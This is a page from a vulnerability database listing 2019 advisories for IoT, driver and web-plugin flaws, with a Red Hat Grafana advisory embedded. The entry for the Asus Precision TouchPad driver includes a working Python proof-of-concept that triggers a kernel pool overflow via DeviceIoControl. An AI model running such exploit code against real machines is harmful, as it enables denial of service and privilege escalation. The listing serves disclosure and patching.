VARIoT IoT vulnerabilities database
| VAR-201909-0027 | CVE-2019-6179 | XML External Entity vulnerabilities in Lenovo XClarity Administrator and Lenovo XClarity Integrator |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
An XML External Entity (XXE) processing vulnerability was reported in Lenovo XClarity Administrator (LXCA) prior to version 2.5.0, Lenovo XClarity Integrator (LXCI) for Microsoft System Center prior to version 7.7.0, and Lenovo XClarity Integrator (LXCI) for VMWare vCenter prior to version 6.1.0 that could allow information disclosure. Security vulnerabilities exist in Lenovo XClarity Administrator (LXCA), Lenovo XClarity Integrator (LXCI) for Microsoft System Center, and Lenovo XClarity Integrator (LXCI) for VMWare vCenter. An attacker could exploit this vulnerability to disclose information.
| VAR-201909-0029 | CVE-2019-6181 | Lenovo XClarity Administrator Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
A reflected cross-site scripting (XSS) vulnerability was reported in Lenovo XClarity Administrator (LXCA) versions prior to 2.5.0 that could allow a crafted URL, if visited, to cause JavaScript code to be executed in the user's web browser. The JavaScript code is not executed on LXCA itself. Lenovo XClarity Administrator (LXCA) contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. Lenovo XClarity Administrator (LXCA) is a centralized resource management solution from Lenovo, China. The product provides agentless hardware management capabilities for servers, storage, network switches, and more. There is a cross-site scripting vulnerability in versions earlier than Lenovo LXCA 2.5.0.
| VAR-201909-1669 | No CVE | Sangfor VPN equipment has a command execution vulnerability (CNVD-2019-23107) |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
Sangfor Technology Co., Ltd. is a provider of products, services and solutions focusing on enterprise-level security, cloud computing and infrastructure.
Sangfor VPN equipment has a command execution vulnerability, which can be exploited by attackers to gain server permissions.
| VAR-201909-1670 | No CVE | Sangfor VPN device has command execution vulnerability (CNVD-2019-23106) |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
Sangfor Technology Co., Ltd. is a provider of products, services and solutions focusing on enterprise-level security, cloud computing and infrastructure.
Sangfor VPN equipment has a command execution vulnerability, which can be exploited by attackers to gain server permissions.
| VAR-201908-2191 | No CVE | Xiaomi Mi Band 4NFC has logic flaws |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
Xiaomi Mi Band 4NFC is a smart bracelet produced by Xiaomi Technology Co., Ltd.
Xiaomi Mi Band 4NFC has a logic flaw vulnerability. Attackers can use this vulnerability to obtain sensitive information.
| VAR-201909-0009 | CVE-2019-4321 | Vulnerabilities related to certificate and password management in multiple IBM products |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
IBM Intelligent Operations Center V5.1.0 - V5.2.0, IBM Intelligent Operations Center for Emergency Management V5.1.0 - V5.1.0.6, and IBM Water Operations for Waternamics V5.1.0 - V5.2.1.1 do not require that users should have strong passwords by default, which makes it easier for attackers to compromise user accounts. IBM X-Force ID: 161201. The vendor has confirmed this vulnerability and released it as IBM X-Force ID: 161201. Information may be obtained. The product has functions such as data visualization and real-time collaboration. IBM Water Operations for Waternamics is a predictive analytics platform for water operators. The platform includes functions such as infrastructure management, asset management, and operation management for water operators. The vulnerability stems from the failure of the program to require users to use strong passwords by default. Attackers can use this vulnerability to control accounts.
| VAR-201908-0045 | CVE-2019-6113 | ONKYO TX-NR686 A/V Receiver Path traversal vulnerability in devices |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Directory traversal vulnerability on ONKYO TX-NR686 1030-5000-1040-0010 A/V Receiver devices allows remote attackers to read arbitrary files via a .. (dot dot) and %2f to the default URI. The ONKYO TX-NR686 A/V Receiver device contains a path traversal vulnerability. Information may be obtained. ONKYO TX-NR686 1030-5000-1040-0010 A/V Receiver is a home theater device produced by ONKYO, Japan. The vulnerability stems from a network system or product that fails to properly filter resources or special elements in file paths. An attacker could exploit this vulnerability to access locations outside of restricted directories.
| VAR-201908-0356 | CVE-2019-15630 | MuleSoft Mule Runtime and MuleSoft API Gateway Path traversal vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Directory Traversal in APIkit, HTTP connector, and OAuth2 Provider components in MuleSoft Mule Runtime 3.2.0 and higher released before August 1 2019, MuleSoft Mule Runtime 4.1.0 and higher released before August 1 2019, and all versions of MuleSoft API Gateway released before August 1 2019 allow remote attackers to read files accessible to the Mule process. MuleSoft Mule Runtime and MuleSoft API Gateway contain a path traversal vulnerability. Information may be obtained. Path traversal vulnerabilities exist in Mulesoft API Gateway (all versions), APIkit, http-connector and OAuth2 Provider modules in Mulesoft 3.x and 4.x versions. The vulnerability stems from a network system or product that fails to properly filter resources or special elements in file paths. An attacker could exploit this vulnerability to access locations outside of restricted directories.
| VAR-201908-0957 | CVE-2019-15820 | WordPress for login-or-logout-menu-item Plug-in open redirect vulnerability |
CVSS V2: 5.8 CVSS V3: 6.1 Severity: MEDIUM |
The login-or-logout-menu-item plugin before 1.2.0 for WordPress has no requirement for lolmi_save_settings authentication. The login-or-logout-menu-item plug-in for WordPress contains an open redirect vulnerability. Information may be obtained and information may be altered. WordPress is a blogging platform developed by the WordPress Foundation using the PHP language. The platform supports setting up personal blog sites on PHP and MySQL servers. login-or-logout-menu-item is a plugin for the login / logout function of website users. An attacker could use this vulnerability to modify the login URL without authorization and redirect the user to a malicious website to steal user credentials.
| VAR-201909-0885 | CVE-2019-15043 | Grafana Access Control Error Vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana. Grafana contains an access control vulnerability. A denial-of-service (DoS) condition may result. Grafana is a set of open source monitoring tools from Grafana Labs that provide a visual monitoring interface. This tool is mainly used to monitor and analyze Graphite, InfluxDB and Prometheus.
An access control error vulnerability exists in Grafana that could be exploited by an attacker to cause a denial of service.
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: grafana security, bug fix, and enhancement update
Advisory ID: RHSA-2020:1659-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2020:1659
Issue date: 2020-04-28
CVE Names: CVE-2019-15043
====================================================================
1. Summary:
An update for grafana is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64
3. Description:
Grafana is an open source, feature rich metrics dashboard and graph editor
for Graphite, InfluxDB & OpenTSDB.
The following packages have been upgraded to a later upstream version:
grafana (6.3.6). (BZ#1725278)
Security Fix(es):
* grafana: incorrect access control in snapshot HTTP API leads to denial of
service (CVE-2019-15043)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat
Enterprise Linux 8.2 Release Notes linked from the References section.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Package List:
Red Hat Enterprise Linux AppStream (v. 8):
Source:
grafana-6.3.6-1.el8.src.rpm
aarch64:
grafana-6.3.6-1.el8.aarch64.rpm
grafana-azure-monitor-6.3.6-1.el8.aarch64.rpm
grafana-cloudwatch-6.3.6-1.el8.aarch64.rpm
grafana-debuginfo-6.3.6-1.el8.aarch64.rpm
grafana-elasticsearch-6.3.6-1.el8.aarch64.rpm
grafana-graphite-6.3.6-1.el8.aarch64.rpm
grafana-influxdb-6.3.6-1.el8.aarch64.rpm
grafana-loki-6.3.6-1.el8.aarch64.rpm
grafana-mssql-6.3.6-1.el8.aarch64.rpm
grafana-mysql-6.3.6-1.el8.aarch64.rpm
grafana-opentsdb-6.3.6-1.el8.aarch64.rpm
grafana-postgres-6.3.6-1.el8.aarch64.rpm
grafana-prometheus-6.3.6-1.el8.aarch64.rpm
grafana-stackdriver-6.3.6-1.el8.aarch64.rpm
ppc64le:
grafana-6.3.6-1.el8.ppc64le.rpm
grafana-azure-monitor-6.3.6-1.el8.ppc64le.rpm
grafana-cloudwatch-6.3.6-1.el8.ppc64le.rpm
grafana-debuginfo-6.3.6-1.el8.ppc64le.rpm
grafana-elasticsearch-6.3.6-1.el8.ppc64le.rpm
grafana-graphite-6.3.6-1.el8.ppc64le.rpm
grafana-influxdb-6.3.6-1.el8.ppc64le.rpm
grafana-loki-6.3.6-1.el8.ppc64le.rpm
grafana-mssql-6.3.6-1.el8.ppc64le.rpm
grafana-mysql-6.3.6-1.el8.ppc64le.rpm
grafana-opentsdb-6.3.6-1.el8.ppc64le.rpm
grafana-postgres-6.3.6-1.el8.ppc64le.rpm
grafana-prometheus-6.3.6-1.el8.ppc64le.rpm
grafana-stackdriver-6.3.6-1.el8.ppc64le.rpm
s390x:
grafana-6.3.6-1.el8.s390x.rpm
grafana-azure-monitor-6.3.6-1.el8.s390x.rpm
grafana-cloudwatch-6.3.6-1.el8.s390x.rpm
grafana-debuginfo-6.3.6-1.el8.s390x.rpm
grafana-elasticsearch-6.3.6-1.el8.s390x.rpm
grafana-graphite-6.3.6-1.el8.s390x.rpm
grafana-influxdb-6.3.6-1.el8.s390x.rpm
grafana-loki-6.3.6-1.el8.s390x.rpm
grafana-mssql-6.3.6-1.el8.s390x.rpm
grafana-mysql-6.3.6-1.el8.s390x.rpm
grafana-opentsdb-6.3.6-1.el8.s390x.rpm
grafana-postgres-6.3.6-1.el8.s390x.rpm
grafana-prometheus-6.3.6-1.el8.s390x.rpm
grafana-stackdriver-6.3.6-1.el8.s390x.rpm
x86_64:
grafana-6.3.6-1.el8.x86_64.rpm
grafana-azure-monitor-6.3.6-1.el8.x86_64.rpm
grafana-cloudwatch-6.3.6-1.el8.x86_64.rpm
grafana-debuginfo-6.3.6-1.el8.x86_64.rpm
grafana-elasticsearch-6.3.6-1.el8.x86_64.rpm
grafana-graphite-6.3.6-1.el8.x86_64.rpm
grafana-influxdb-6.3.6-1.el8.x86_64.rpm
grafana-loki-6.3.6-1.el8.x86_64.rpm
grafana-mssql-6.3.6-1.el8.x86_64.rpm
grafana-mysql-6.3.6-1.el8.x86_64.rpm
grafana-opentsdb-6.3.6-1.el8.x86_64.rpm
grafana-postgres-6.3.6-1.el8.x86_64.rpm
grafana-prometheus-6.3.6-1.el8.x86_64.rpm
grafana-stackdriver-6.3.6-1.el8.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2019-15043
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.2_release_notes/index
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc.
| VAR-201909-1469 | CVE-2019-10709 | Asus Precision TouchPad Vulnerabilities related to authorization, permissions, and access control |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
AsusPTPFilter.sys on Asus Precision TouchPad 11.0.0.25 hardware has a Pool Overflow associated with the \\.\AsusTP device, leading to a DoS or potentially privilege escalation via a crafted DeviceIoControl call. Asus Precision TouchPad contains vulnerabilities related to authorization, permissions, and access control. Information may be obtained, information may be altered, and a denial-of-service (DoS) condition may result. Asus Precision TouchPad is a touchpad driver from ASUS, Taiwan. A security vulnerability exists in Asus Precision TouchPad version 11.0.0.25. An attacker could exploit this vulnerability to cause a denial of service and escalate privileges.
#!/usr/bin/python
# Exploit Title: Asus Precision TouchPad 11.0.0.25 - DoS/Privesc
# Date: 29-08-2019
# Exploit Author: Athanasios Tserpelis of Telspace Systems
# Vendor Homepage: https://www.asus.com
# Version: 11.0.0.25
# Software Link : https://www.asus.com
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows 10 RS5 x64
# CVE: CVE-2019-10709
from ctypes import *
import sys  # required for sys.exit() in the error path below
kernel32 = windll.kernel32
ntdll = windll.ntdll
NULL = 0
# Open a read/write handle to the driver's device object
hevDevice = kernel32.CreateFileA("\\\\.\\AsusTP", 0xC0000000, 0, None, 0x3, 0, None)
if not hevDevice or hevDevice == -1:
    print "*** Couldn't get Device Driver handle."
    sys.exit(0)
buf = "A"*12048
raw_input("Press Enter to Trigger Vuln")
kernel32.DeviceIoControl(hevDevice, 0x221408, buf, 0x1, buf, 0x1, 0, NULL)
| VAR-201909-1434 | CVE-2019-10988 | Philips HDI 4000 Ultrasound Systems Vulnerable to information disclosure |
CVSS V2: 3.6 CVSS V3: 3.4 Severity: LOW |
In Philips HDI 4000 Ultrasound Systems, all versions running on old, unsupported operating systems such as Windows 2000, the HDI 4000 Ultrasound System is built on an old operating system that is no longer supported. Thus, any unmitigated vulnerability in the old operating system could be exploited to affect this product
| VAR-201908-0650 | CVE-2019-14979 | WordPress for WooCommerce PayPal Checkout Payment Gateway Plug-in input validation vulnerability |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
cgi-bin/webscr?cmd=_cart in the WooCommerce PayPal Checkout Payment Gateway plugin 1.6.17 for WordPress allows Parameter Tampering in an amount parameter (such as amount_1), as demonstrated by purchasing an item for lower than the intended price. NOTE: The plugin author states it is true that the amount can be manipulated in the PayPal payment flow. However, the amount is validated against the WooCommerce order total before completing the order, and if it doesn’t match then the order will be left in an “On Hold” state. WordPress is a blogging platform developed by the WordPress Foundation using PHP language. The platform supports setting up personal blog sites on PHP and MySQL servers. The vulnerability stems from the failure of the network system or product to properly validate the input data
| VAR-201908-0649 | CVE-2019-14978 | WordPress for WooCommerce PayU India Payment Gateway Plug-in input validation vulnerability |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
/payu/icpcheckout/ in the WooCommerce PayU India Payment Gateway plugin 2.1.1 for WordPress allows Parameter Tampering in the purchaseQuantity=1 parameter, as demonstrated by purchasing an item for lower than the intended price. WordPress is a blogging platform developed by the WordPress Foundation using PHP language. The platform supports setting up personal blog sites on PHP and MySQL servers. An attacker can exploit this vulnerability to tamper with the 'purchaseQuantity' parameter to change the product price
| VAR-201908-0948 | CVE-2019-15806 | ARRIS TR4400 Vulnerabilities related to authorization, authority, and access control in devices |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
CommScope ARRIS TR4400 devices with firmware through A1.00.004-180301 are vulnerable to an authentication bypass to the administrative interface because they include the current base64 encoded password within http://192.168.1.1/basic_sett.html. Any user connected to the Wi-Fi can exploit this. The ARRIS TR4400 device contains vulnerabilities related to authorization, permissions, and access control. Information may be obtained, information may be altered, and a denial-of-service (DoS) condition may result. CommScope ARRIS TR4400 is a wireless router made by CommScope. An attacker could exploit this vulnerability to gain access to the management interface.
| VAR-201908-0947 | CVE-2019-15805 | ARRIS TR4400 Vulnerabilities related to certificate / password management in device firmware |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
CommScope ARRIS TR4400 devices with firmware through A1.00.004-180301 are vulnerable to an authentication bypass to the administrative interface because they include the current base64 encoded password within http://192.168.1.1/login.html. Any user connected to the Wi-Fi can exploit this. The ARRIS TR4400 device firmware contains a vulnerability related to certificate and password management. Information may be obtained, information may be altered, and a denial-of-service (DoS) condition may result. The CommScope ARRIS TR4400 is a wireless router from CommScope. An attacker could exploit the vulnerability to access the management interface.
| VAR-201908-0981 | CVE-2019-15745 | Eques elf Vulnerabilities related to the use of hard-coded credentials in smart plugs and mobile applications |
CVSS V2: 3.3 CVSS V3: 8.8 Severity: HIGH |
The Eques elf smart plug and the mobile app use a hardcoded AES 256 bit key to encrypt the commands and responses between the device and the app. The communication happens over UDP port 27431. An attacker on the local network can use the same key to encrypt and send commands to discover all smart plugs in a network, take over control of a device, and perform actions such as turning it on and off. There is a security hole in the Eques Technology elf smart plug
| VAR-201908-2190 | No CVE | Qinghan Technology QH-S302 terminal display device has unauthorized access vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Qinghan Technology QH-S302 terminal display device is the terminal part of the information release system.
Qinghan Technology's QH-S302 terminal display device has an unauthorized access vulnerability. Attackers can use this vulnerability to obtain sensitive information.
| VAR-201908-2195 | No CVE | WPZD-163 (II) Logistic Defect Vulnerability in Integrated Measurement and Control Terminal of Distribution Network |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Xu Ji Group Co., Ltd. is a high-tech modern industry group focusing on power, automation and intelligent manufacturing.
There is a logic flaw in the WPZD-163 (II) integrated measurement and control terminal of the distribution network. Attackers can use this vulnerability to download system files.
| VAR-201908-0648 | CVE-2019-14977 | WordPress for WooCommerce Instamojo Payment Gateway Plug-in input validation vulnerability |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none. The WooCommerce Instamojo Payment Gateway plug-in for WordPress contains an input validation vulnerability. Information may be tampered with.